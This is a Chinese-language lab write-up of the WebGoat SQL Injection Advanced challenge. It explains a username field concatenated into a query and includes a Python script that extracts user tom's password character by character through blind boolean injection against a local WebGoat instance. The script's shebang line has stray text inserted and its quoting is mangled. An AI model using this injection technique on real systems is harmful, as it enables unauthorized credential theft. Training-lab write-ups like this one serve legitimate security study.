问题代码块:
直接将username_reg拼接到checkUserQuery,然后进行sql查询。查询到有结果则返回已存在用户,否则则使用PreparedStatement和占位符去声明insert语句,然后再使用setString去设置对应参数之后再执行。insert的过程没有问题,我们利用statement.executeQuery(checkUserQuery),以爆破的方式根据返回结果来获取tom的密码。
条件为真,查询到信息,所以返回“PAYLOAD already exists please try to register with a different username.”,”lessonCompleted” : false
条件为假,查询不到信息,返回“PAYLOAD ceated, please proceed to the login page.”,”lessonCompleted” : true
用length()爆破出密码长度为23
利用substring()写脚本去爆破密码
脚本:
#!/usrDSO观星市场部/bin/env python # -*- coding:utf-8 -*- # author:jack # datetime:2019-09-01 22:31 # software: PyCharm import requests import string def getPassword(): cookies = {'JSESSIONID': 'dZcRiB0wXwYNLWxpjqdGiIHl2jJojW2fj4-eJRxT'} url = "http://127.0.0.1:8080/WebGoat/SqlInjectionAdvanced/challenge" password = '' for num in range(1, 24): for word in string.lowercase: pa = 'tom 'and substring(password,'+str(num)+',1)=''+word+'' -- kljh' payload = {'username_reg': pa, 'email_reg':'123%40123.com', 'password_reg': '123', 'confirm_password_reg': '123' } r = requests.put(url, cookies=cookies, data=payload) if r.json()['lessonCompleted'] == False: password += word print('password:' + password) break if __name__ == "__main__": getPassword()
本次文章到此结束,感谢您的翻阅,期待您的宝贵意见。